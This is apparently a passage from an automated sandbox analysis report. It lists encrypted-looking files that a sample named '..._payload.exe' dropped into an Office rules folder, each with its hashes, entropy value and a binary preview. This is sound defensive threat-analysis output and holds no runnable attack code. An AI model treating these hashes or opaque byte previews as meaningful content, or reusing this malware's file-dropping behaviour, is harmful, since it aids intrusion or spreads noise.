                                                                                                                          Preview:.<?~"...{.Hp..{.......s...>1F.#2.y......C. :.\..*..2....m,...gv../..@..q.@:.....)...1...f.B..&.Q.ZF...h........!.I..)......P.C...M..zd..h.f/`....G{..A.....*.8..}Bdy;].R...,.F...Q9..C.5R...9X.R...6'7=..u.%..u....Ig..f...p.@.....E.....u.......).......WA.U..D..c.l.....4...r...8.....C.%..B E:V..T..../.x..O...m!.X...n..9....c.f...\.]G...&.^j...-=I..>$...x.-N...zU9..2h.?..X....W*5.z........./uI...&..'..I.k!{...j.T.4qONo....j.4..x.O?..Zh1..l.6..j.[.|..4q.G...E70.o.$F.["....x...2........i....c.P.m.Ha..p......;G.7\.(V..x..!N.D.F....JJm..a{..x[.n....2.j.....t..y.....~...!.J.........zu..s'..0.m..e.p..!.Xw..>|.&..8....,|;..i......o....{..0..{...*....9....].y0......4r..e'\..k..7Yl...kt...}(^.|v.~T..x(\....)l.M/I4.8.P&A.W.{o...*&..\.E...tT..S.....p....K..>.7.#A..:=Ol......b.y/?.0.40.EU....;...QzX(......!]y..v..8Q...K...^".a.'I..Mz!..$..A..T.R.+.I.d..Nz.r.....>.yf|;..{.|...#>.."....&R..&.R..6...hI..x...1.....nZ.k...'.};`.~.4.<....i0_.4@(f:..k..m.F.o<.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703801v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1753
                                                                                                                          Entropy (8bit):7.870815418030638
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:RnG/8nP00t5PUeW0oJnsUn1AHD0fxTucD:FG/M0G8AoVsUnKH4fpP
                                                                                                                          MD5:9F5818C4372444D28214F46C38ADD9A5
                                                                                                                          SHA1:B243DDF43BAB90F4AEFE2F2AB759F039C513F5A9
                                                                                                                          SHA-256:0EDCF7ACE5C698CC171FBF296033E544EE84AC23EA362CC8450F1E4803FAD848
                                                                                                                          SHA-512:909181F5C5E7F266758DB85234287A22A4FCBDD2EB09A23F2ADA5F839CBD4E766C64B191F8BDAD5AC9B2C2019AC1872BCC44963701DD903F27A29022B71CC3FD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?=.l..'.....t.A7k.@}....tm1.D.....@s.w..q....=f..+...lTb.f.O.HiuS........|.7.Q.S{?P..j...U.w.s(.?.,9.^....eU2.#...z..zu..0.`I..o....L/P..ep0.L..=.D?.....W...1...s..2@.&..."g...z@...M...TO.U.a...'z..c....*....-`......m,;..y.{..\...........W1D..4..K.... :Uu.Nn.jKK..<d..AF..U...._k..6..P..,...>..$..X}.cB..P..z..c....kQ.bz..W...u^o./..,}7q..MW...p..Px..J+....K.......!}...7@..q..@T"........$|.'].l*.......Gg..(D..t.f?B....c.`1>>....D.....gO.. 6.@\O*.z...8.*t0.*Y$..1.]s..X.$..p....;P.#.p.....e.1z..O.`.%C.........w.s.W..k..X.80}M.*u\......8.s+.......y.u...^4.QL./.@....P9h......c9.Mt...Co.Q.....)E.0.?..aI..E'.B.9,"...=.@r..E..L~....o.....V..4.|..;qe\.N.m.H.RK..}.b#[\.Y.b.7G...i......kB.!....|Cs...7....pxG..y...g*&'ax..b.w7'.H.GB...WzP......)a.*......#..B.x ....f1..).g$}.O&..;ID.......P.T.K#.....}-a.`b..Y...H(..o..\...G......RE.).S...%^.GG+L...I....4...q...X@..Y....0.D<..:........^j.....,.....I..W..H......w...T.Jv....A.p+.Pk.<ub x..}..Z..:..,...E....}...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703850v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1739
                                                                                                                          Entropy (8bit):7.88940162468627
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DpNCfBj4nU0ioqnx3iiYR0TZ+H78uEpQSpWtXa79Ci6EGhIx5S64ZvSvKd7gbD:dOKnUCqx3dYqkou0pq3he5SXavKF6D
                                                                                                                          MD5:C2AE549778321A57FDDA78151F600A5B
                                                                                                                          SHA1:3C599D5FDF4E6914422F37F051ED8199B18D65F2
                                                                                                                          SHA-256:726CE4CD275CA0B1CF3B115EEDA2672D031DB42AA38744416B43429420065DD2
                                                                                                                          SHA-512:7A70DAF9AD836BA65CB53BA89F9CCE643A411E86578521BAB68EAADDC06C5CEFC098E716643678EC934018F618B36D4306C9AAB416242E87C17BBB86B75742FA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?r.......k.......F.M....Da'B<Z.......UF-...j.u...{.yq..B.P..l~..<....\S....-...B..L..^..H)`t._..i.5....=~06\..Dc..UR.D.A...4.+y..j..x./..6j.O.[N._.'g.[.$+W.Q.../....5.q.......{.P...g.#pG...x)....4.>ZWT2`.M..2...R.T.>.....g.;.G..g.". .(.....x.........~m.4...o\%8.b<..9(....g..!...h...Y.......".A......g75k!..@.F.A.p3.x?..(.#`ECVfx.....q..t.8.....F...o.../.L....o$...80.....u.ZV........`..4W.8.....k...h........1.Q.6r(..$... _J..X.],e..D.q'..R...O@y...LX......%........C-.x^..4v...:.R.\M..X...m'..Vj..I.v-}.E..0T.5....G.iO/u>....+@......X..h.y]5..A.Z'.....6.v...?K6..S..2.;.}.q+.e..l..k..L..n......?A.]-....j......&..f.a.=f...u.T/-&..O.... .v^Sb2.z1c4.../..2.A....>..YC.f.&.n*.G....P.RR..=|X..,.......l\ ..Oo_...%K..0v.B......].\{.........`..[(...!..VwV2oW....1..-.@.;.|.......L...W.{yC..v..b*....2TU!^]s@)?....Tz]..........y.a5Xk..J...%.W5q\HW...A...f.x!..v.......T.e*...(s..B.[A!<....!.............H.N.?%......c.,r)....]..Y...:.gA?.P.5.@G.....B.HN,...g..z..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703851v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1776
                                                                                                                          Entropy (8bit):7.8862239665650815
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:dKqPyB3wKE/W8B2NPC+FKkwhzV2BT7/BENUHD:N97B2NjFFwhzV27ENUj
                                                                                                                          MD5:B2CFBE89B1887AEB4A6B0DCAAEABE3A1
                                                                                                                          SHA1:FA925B5248B14EC407FABEC09CC29B39D114D711
                                                                                                                          SHA-256:412DB4C9EB435731EF144E0906032D75E74D11A896E0F52C24E84206EDDF6B95
                                                                                                                          SHA-512:4F586541314F556B3EB9FC495A91F7791832E523FCD09451011FA6CA0FA068880D3645B996277312C9C03D355933B2F3789A0BF5457ECB6CD48A1B74CAF663EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.=o...<_./....D(.t.p.......]]e.H.\....=..T.....#...w..x...`{....^...EHri{C..i...e./7F..S..S.b.H.:..........`.Y..,M=..r..^.p...4....RjC.2.L...#+<y.{9`i..\....r.C}/.Fwz#R..R.]D[...........g...E...E..~...0..pd..R..bD......+..];.s....7N...n.|......a..C.....1...1s..b.W..nh.<0.$I7..../.R.c.......EoW.T..n.*=..B...K..{.x....Bki....i..8...R.~b.e....[Z.!Y.f..J...-..$.=.3.Yr7..w1.9f.*Fm....^.?j...B.[i..g..n.e~N5.,...c$.C1./..............a..sI.RL..[......^..W....4.._F....;..%...%..H..y..'......'.&..W.,k...|"..@.P.pw..A....R.W.2_.:....D.m.b....EXVb.-.c....).A.MT.."...T.Z2.9....pB..B..........09....;4.|y..[..@...'.q.ku:qE=..A..7K..r...n6../J#.$?.... .... v....$dO.5II:....r."B.Wn.B.|.S..X`....|..*j.6Pe0...Id.;Q........Pn...C0.I.".G....o..11%.z...<mBV......B7.w.3L..._........&e...",..2.........v.u.B,.6....v..l4G..:5#..D"?...{7.K.(B.,...{9.u4or.Y...#6.U..a.g..w2$.....{..x......e.@.l....;..&\..z..'..}.....G.R...=?.B.n;KZ...rF..A8....Z.5;......+>aq.X.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703900v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724
                                                                                                                          Entropy (8bit):7.891025005533874
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:HL0Bnd0frv4gTfUX4h8IifCtv1DLlWoLJ7djrY8D:Hqgrv4+fUX4Em9NjLLjr9
                                                                                                                          MD5:EAA4968C168BA013E4EDA7318F11F73B
                                                                                                                          SHA1:EF398A3F130B2BE8AA5F99F120BF5CD9665F13BB
                                                                                                                          SHA-256:85768ED3FEB15FB1D2AA7CDE6DD06B7792803B676677CBC84DD3B2A986093F35
                                                                                                                          SHA-512:1138232F2DF83C82CC550BC6B9B55DDFEAF18EAA0A3BAE68583D3E9E7A25F96F254227545A92D9B300B8496EC0DC9B9B02AA2DFBC3B8B3586C1261B78DCF65E4
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.....].:.}}G..4...+..$..-.......?..9M.Ny."...e{...GN...m.G...%.5F.{+.<.$f.l...w.WDWDA......9dt..}.....h..,......_.Z_.?...u..*T.6..._.L....8OX..J...O.:..].+J.Q=...g! ....0r8y.~%...j|......iX.|t..x.U.m.V6.)...)J.Ao...F9"U7..*.!/.~...|..}3h....W....<.U.....&..}l_..`.T.!..k...OF.".M..G........8..Y.8.B........uH.'5.e..|...I...S.q.l`.C.)Ui....q.EK...).cv.&%_J.D....Dk.....02...3...^....4......xK..o....... ..:.o.....:I........Tn...0.?v@C....K....`..0|.8WyF*.::<...S.V0.M.!..H......|..?.?.X..S.3}...1.a.6nc2......Z.....>...<...z.!I.7..A-.../....U...........e..Z0..`...Iw...Y..R!y.X\..y....'/....%......U.D6.........ZB..%..T.z.g[....['.kb.......z.t.\{.....-...........HuB.G.x"..oz...#....C.|.f..t..dS...K.1.s.3.....p...2....O......{.j.h.+..ysi...|..t!...N...O..r.G...0.6x..B....hd:..I.J.`*...J...'2_<...~..iA...N.s....\...q.x...t.....5....z+N~..).P.m-..i......$..`..7...H...7.Q.);r.(.0..........?..).Xs...i._.....J.9..H..a.;#.i.yG...m.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703901v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1761
                                                                                                                          Entropy (8bit):7.894441407354901
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ta/btGNkspJQDN83B6JKclodf1BHkLTVm7+ZpBt4LfIzrED:ta/btGTpJKG3I07ydZpv4LfIz0
                                                                                                                          MD5:8CB3B480A8F4A2B0B0FEBE6FFF76974A
                                                                                                                          SHA1:AFB53CA9D5B9C3665CC85F7F069F20008C3047B9
                                                                                                                          SHA-256:ED0667C435410F166AFD6F69E3A6002A6E182F7F75D8A0D992727AA3FA8A2266
                                                                                                                          SHA-512:AD5C8F6AACFA933B338E0758EFC6722A34B88CDA38EE72CD8A61C36CBB5ABF1AAE394DF7E0CFAFE69EEF2BC54369F4D771D5C4A163606673A0074D5484102840
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?......a.I l...~...=.A.T\".L..B.(C.....g'.P.e...K..d%....F.....W...R.{$.`..3.,...r.....L..".u.}n\..wc..0,....1.4.2.....#7.g...9k;..x....I.|t..."..~.....n..?O..v..7G..O..(......Sg..zf.t.....>l....3.2...8q...=.0..P^......S.'.9;5.....J.V.R..zW....g..x....c.d.?....X7........m.b=...:...*.^...b..W..|'..%..R.TL.j.-?r?..R.m..=W..a.4.fp.oi......mG....>..p.M..Vl9. q....Sdk.p{..W.BK....#jC.T8?;.._hW..zB.^^....5..Kw..5.X.K.j.........]..+........_.u....B....C.....,....V..OPI.f.N4W..P.?.......J.2.bv..\......9|.gZ....lQ{j..z2..t5DXGm..m*.....b+UA.`]..%......L...I9O.Q.....D.{j..k.Z!..~Q...8...C....!.:~D!.....iI..R.p...^...BqS..43..[+.'`....P`.3..bJ..e4M6.Z.....k..0......"ny..B#{..f.[...4..o.-_.9.;K.(....;b.>.....KQ|N..:a..........F...T...v..b......B86.6.*..H_.<.i..K(..!..v...../...[...........y..].R..r.....~.p..M.J^......RI....6.1.>Q.P.....C#.+..9..s....W.,.+...M...(...3("v...N.....#.. i(n..*.f...nK~.U...l.)...D..-z.....H'?........%

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703950v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1700
                                                                                                                          Entropy (8bit):7.880102149099947
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:1VshBOWlVYccacq8Y2n35Od3eZFPGnDqCrv+tgPD:10NcqdM3YReDPGDqCTie
                                                                                                                          MD5:A497934A1CA018B15FE469D469A362B8
                                                                                                                          SHA1:BD1F49E19C9725B174A220012CCB6C21ECF3FC56
                                                                                                                          SHA-256:57BA4C8941BA2743AA070ADA1F12612FC8A1F47A1A8233490D476219918E465A
                                                                                                                          SHA-512:392333AE02AE96513A8D3E548FA8B6A640B3508DF494C3A0D9ED891C4079036FBC63071C058C2A1D48CD383BA4BDC29835DA1CF24F8F85CB0FFE5875A77AC2C7
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...;D"..V.l=..N...Z.!.Um .T...Q`O....M}.c...._..VF$.......R..1.0rg.._:.....3...%..k..;.Q......Z...../I4..&0...UJ...F...t...'..........."X...0(L..=y..!.u..........I...&Z.2.YF.P.)%2u.........j.V..u....$"..].;....#(f=..mD...oQP.......(9.nf.'.FJ...,.HE...FLK.IH.....q.Jfc\...U.....>kP]...rNl...z.I..J;..2k....&......3]...j...x.[m,.1..h.f-|n!......|....'-D8..A...!.('.....z5..%.(i...Z...].*m....c...FT....9~*...9..=j.n.g..M...XE.d......g...,..X..0`.3..k.............B<^US.c..R..I........j.Q<. c..{..X......L..e.M..h....~ .a.!i6v*.[..0-u......8l@..y.\...y.....F..EB...Of.....3.<...jDH..{....P.3%<.&.....R/'..vz..[.A...w.....@.:1:...[wv...........XB.wY.h.#......~}..8.6(T..[.\.m.D.L/z.rz.3....Nl..%\j&P..@U.v.3.e]v.4..>i...U..t.k...C...@./....C..c.~..B).O.9.:On....95w.l.s..+..dQU...YB.L.(3...L..}.[....]9..-)..A.1K:k.GY.^'..~.bD.....w...wsDl......v....O.....O......(.'..).8j...E.~`.....(!...7l....'#J+#_..E....x.J...?......h........w....]......p..0

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703951v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.8584784199838165
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:H53LRPWmu9g9rFvboZoPXqoWG1aqx+y91X5D:ZsmNPEZoPaix+y91B
                                                                                                                          MD5:7153543CEFCD5B95D0865297C57B6BCC
                                                                                                                          SHA1:884D5E36FF72D14963039E5EC53C855C5C0D073B
                                                                                                                          SHA-256:2DF474E41C6D2FBEE9FCE94C6F59E2E5CF77524ADCE33AF2B556091C39DDB68B
                                                                                                                          SHA-512:B8D05E4F11198BF8679226D696CAEE2C12B10554DAB66DDCC3C91A5CF81029CCA36DF2CD1A2C38830C55333BA9886C2A04BBF871546C0414E15A7A89A37234BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?6a?..f~..ve.j[.7.[..P.j.3.....1S...$...a."4...j.f.|.8.G4"...F.VS.y..?.....,B.>.Y.$.......?n.\..:m...D....O....T..../6.#k7aWuu.xv+r...z.9....O:.E)...N$.#..y...a.2.....0.Hu.......}.p...?J..C.S...4.,HM?$.cFEo..bd.!..G.JP.w.....}..-.z4/l.../.....&.c..8...l~........-.YD.6C...-Z....IT.v...fH..r.\...s..9Tm;..*..K.Z.5.5..r..w..f0,Py.rH.&.X.e...<}......-<...BSk...w.^."..W..y-h...=..b.Q...}{....X.Jl;#..?.m....Kf.j.g..o.._....Q.N.N.#....$.-......uB.H...r...Z./.Y.....N.Y.....g.%.....0..ll<i.|5^..0.E..P.}o..Jp../.....M.L&..j4vU.2..u..1.A.....,......]5...pQ5x.V.{..q..9...Ir.F...8.P...P.....e.4. .N.....!..n.<.%cc.x9.R.Z....1...t.....I.o....>0F...Sk...S......G2<.....>B".=....7..h..X.2O...D..v..f..b.Od..,DoQ...T".K..X.~.......f.....-...7t.F..q)o.......0Do+'...~..6lr$..*f.R3-a.D.......`.....h'x.....1IA.1...{0.S"...PD.n}.U.sN...+.h..e...AW..[...{2y.U......`....Jt....a.V.......G.pi....R].|...pV.`..i.3.^X^<.%..>;I-0...d...{.3#.....g.c..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704000v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1716
                                                                                                                          Entropy (8bit):7.881506033494524
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:UaGM2qZKbCgdFLae4ahZ7B2J/tI/R483eD:U+szUaiIi83m
                                                                                                                          MD5:1B292B21D5CA3257E6CBE1BB4AD5113C
                                                                                                                          SHA1:7646C46D455F3F395658ECC9FD7C09D887F91488
                                                                                                                          SHA-256:43C31C765EE83747A767B7F39A6D132460045261740BF01DB698C64AB4375532
                                                                                                                          SHA-512:4806C964CBDD5F6876E21DE0390230E058631EE9E2A680D2C444117092049C5E91C79B8B08A7750BE48D718621773E8698401C494BFE0C7A209C1E892B5F23ED
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.....ZH".[.f.?tm...}E.9N..n.[.y. C./j.-P....5\..5<.......n'.......T.2...V....h.p...a'.h.f...._..?u.5...[.hm..<...5.*wi.g. )9.VA .S.#|{.9D.:r....\....n...LJ.$.V.@.I.%.-.l...I..<.k*.C.....}>.+.......y..}T..n....D..4bC.zs..x..,.W....R.79%$.M...=..l...n2.~gc.A.k..+..C.Y...y.&.ArA..L.:Jk{..y.*Y....=b7.i~.s.cY.kg.v.L.$ebQd.t.m.T..X..j.LQ...*x..~y.........6p...or|.{...m....F..@..,.\\.]89...}...~)9...o...b.....%.,N!.....R. L...].3h...[b.1(vz;"4.......p..v&.i....lL.AQ..m.|.mL.....V.8.m..>"!9%.W..DA=. .g..G..#.Z..5....b.......u.....w.e.......=......J....C..u.l.K..f..ta.c...'..&.I.L .!.y.Nd"...s..u......4N..vHhl.x(.{.s..sl.k..x..`.j.,.6.@...].0..E..L.J.....;f.in..%.....pc}Z>U.f.4S>M....@..A,-...sl.a@.^.........iPS..t%.....Yb...~u7.,.v..B.E|.....&.`.....`..{...........Cj.#.e...I.X......Y<:m.O..H}...c..).{.@_.OR}.U.[.t.~=...c.4..oV..g8..._7..OcGB..@.y(7.i...`....... .=...E..R.....!....T..y...........W&<.@.......#y1..+M..R.O..Dw.x.a....I..Y....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704001v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1753
                                                                                                                          Entropy (8bit):7.888301528727375
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:cK7fsEa6qXKr5Dha/VRe1EsM2yrxxBqVUHKjD:DfU6qS5DhRyFxm
                                                                                                                          MD5:CD1A2DA23F9A7D563DCC3773C6AFBF45
                                                                                                                          SHA1:9EB0150B31A10CE47359CD64FFEF0F4509A406EC
                                                                                                                          SHA-256:C506BDAC1C886B47B1235ECEE7A81FBFB04FC476CEB34E3EB34A40A4816B757B
                                                                                                                          SHA-512:E73D4099E945B3F6459EB4A3F8F7DDCE7F1F7DCE420BDA8DA17DCE67D091133E71A632D9EF8947D75C3E21676FAA335AE5795C22E6BC76D061722AAF7800272B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..B{?).3....?.(.!g.w#5-..e.......Z...&.J..m......X..{..p...m......*Dun...:X17.y.7....6..c....;\.b.._..q.e.h..ic..9...{.*....!j..~..<.|M.O.....9%..n..uaO..}1`..I.S.......A.ip7.V..]..E.u..;2....(y...<...e'.9.DH......1.?g.f`.F.p..^CQ..d....go....=.......=....y..,...........\C,_pk"E....=...#...!.."*...+>J8"....cf...L..D;.V...(.......v..V.....x."v`.w...\.o....N...v..%m...a..8..N.....P?....D96..8......H3.w.......qK.,..J..I...._J.....X..(}C.......v.../X..=....CP.n........=........:.: .X..hw]...Rp...1j.....9.8VHN..H._xi.s.#..=..\.@]...\D?..&r..7'.C..~..V.R....fN..:...._P.tE.K..Nl.../..w.%iO 1za...>.....=........W.....1......E....^..U..|.g.t..L.A<...Ix%'g.c.....w....}.v.|.6..Ef.k.]A....p.R.#A..3.K.O&.J.od.4[Yi.7...z.r.....%...h.[.{j!._.6..$....2.....y. .K.:...w.e..^.''.(..;NX.v<g0..u..k...7A.Fjc.gA.]..r..OC..t.Qe......H.&.a.6...".q..A...O.u.......5O...l.@.._.f.8P.}.k...`.!....}....$)#.".A5.....~/......7.vVzV..y...yB ..M.....h.@....v.....Oc+..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704050v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1690
                                                                                                                          Entropy (8bit):7.8886670690965826
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ZaQ8omTEtM/7SNNeUPVwej6GwQhjgdvdD:YNutK7chbel
                                                                                                                          MD5:ADDE176D5BCF599A8408CF1CF2D2FA6C
                                                                                                                          SHA1:E2001B0E1FA20AFF9F934F278C2CFE32DF9272A3
                                                                                                                          SHA-256:B5E1D0297EB65FEC2F578C8F6F714020A4BA50A3B5E12472E04E9B0B62E3F05A
                                                                                                                          SHA-512:1BA5AD4D159DFBA8CC4A98D0A4357D180D55743EE45865A69772A41A92C182E5777DF619052D8D3CF988E08D0D95E0AFA3612C6D9B25F41940FBD166B07979F3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?./...'}.v.}...!.#.@..Vd.I8..9.....K.OAf..m..O~c@..*........sUq8^`d.JD.....6..'f....Ch..HA..DS....w.n."w.#.s-.!.RM..hd}e.A......q.)$q..?N&a=..O.C.Z.......d..a......a(...i*...!~Heh........G_....iS(...9.A..9.1...F....;!..0..z..L.~..4.t.V%....T.g..%..e..h..uR*T..,J(..(cs.....3..xrab..l.A..gT..F...;d.........N.9+... X..j..l..=...1..r2..s...N'....,....RN.S{0&L.(...qW......K$=/.#..).W4W.'.......:"...z......?L..sLA..(..v...TK..e.a=...]S..s.1.;.......d.*.....g.i..).....u.I.q.z...2!0v.(.........6....-...*{p...I..(.$T...+G2.@6\tD.BG....'Ol..@W..!....q..=PtO,..\6........".a.9Yb.9.<Ek......3.W....Z.Z.(.?.3.E?...C.Hs...+.k:.()...i3m....b%..#.A.T.....9....p=.m..xr..y.`.Ep...wh.....=..B.5K..zB.S..~.$.:.>l........so~_.p.....b&..\.U.i.H.]6...@...Z..{.#...a{kK.....Y`<.....-k...;...b......z.C.-.C...).nj.=5Sy....K....0G..|.\..............5.eH.g........}*gB_J..@.0....?...DV;...........r....b&.b..#.5.,2.omE.( E..a1....t...b`..|..I,.j..?c..E.5M:...>(..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704051v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1727
                                                                                                                          Entropy (8bit):7.890531611375527
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:DtSCImb7IpACRAiW33EfoV/WNFSgHC/HcBzyD:DsCImXIppDW30fooNF5Cma
                                                                                                                          MD5:53074C93910E5CF2AEE9012A862D7359
                                                                                                                          SHA1:0601F26B1D1A47210E0E83390EA6C79455C952A3
                                                                                                                          SHA-256:EBDF83FE80495E30A75CE5150E2070A6AC57D1CD94F64FC162E2CBBFB05D6831
                                                                                                                          SHA-512:FE20A4D449678AD9DC1955C6810A35F031A3CE2F40CBF0860424AFCDC38472BCF5D0E77FFD2BE488D7D9792D495401FE3D7020713BB49121D8522BC51F37E26E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.....~.ylZ..y.|....^[A......}......8:..CS.s..a..{.0..{h..Sr.YWKS~...J...{.J.g..H,.F.6../\8"..}. +....K.$.f.^z.N'.$S.0.n...FZg0@....0..E.G1.@.6..X>...s7pn.!..&c..8.YB.o..Fa...G.|3..S..L..u....&.R-....m./..|.K..=....pTXz.x.M.!....t.$.......p..6..;..15.D....(.6.G.U..`w.$h..[.a#...P......4..D...].Cs.4.[._1.#Y..B.<....6X\fK....1....Z.....gab.6=<-og.R...0..6]-....U.j.1.......F.y.7....f.p?...:=B2.H..R.Bi.S.....K.o.c...o.ja.....V..gH.'..qR.n.c.JL4.....$.x.1&6..4r..|...z..g...Czx}....*bR.....yv.....x......'tG...V.......Po.={RX:...Rv.Ce$)Z.."...U$.........:7^....-;m!S.9..A.sY%_6Q].W+......i...Z.S....V.c..T."Y..R....g..A6I....p8.I.?..z.Qf....1.yl)..,....q..Hb....c...H(....3..L./...[........<...\..-C....sE...rxrL`....#....)....KV^C..1H..E..F.. ..G.....#../.....m......HI.k.<.n....:9$]..i...J......=$.&....b+.Q.Wm.,.....a.,.!........@^=@..4&92..G...r......Y.....Ea...1i.]..Gi..Ws./...*.M#w7.'.....G*-..HO~.r.5..@cO.3....(.....X.......Y..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704100v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1696
                                                                                                                          Entropy (8bit):7.873628466827935
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:CfldaOMfdnlrRTS0wPyKuyMkLN+cGlJgadD:E/MRlrNw6pTcGLgQ
                                                                                                                          MD5:1035F2A1F07481C7159A312CAA84A562
                                                                                                                          SHA1:AB1A3AE4049462457DE44435EAE2E8A582568835
                                                                                                                          SHA-256:E4A6631F8B7E4FB733A0E60ED99928497B4B5624F3BFBB642BCB48A385FE009B
                                                                                                                          SHA-512:FF58F2DCF464CC0F4FF641958BA7164BAFDB6350E33AF19171BC892ECC87038B1CEAD62F9A14D1EAF56A29BAD8BE431CC529B8F9F2F387EE9E43D50C9F4D0FC4
                                                                                                                          Malicious:false
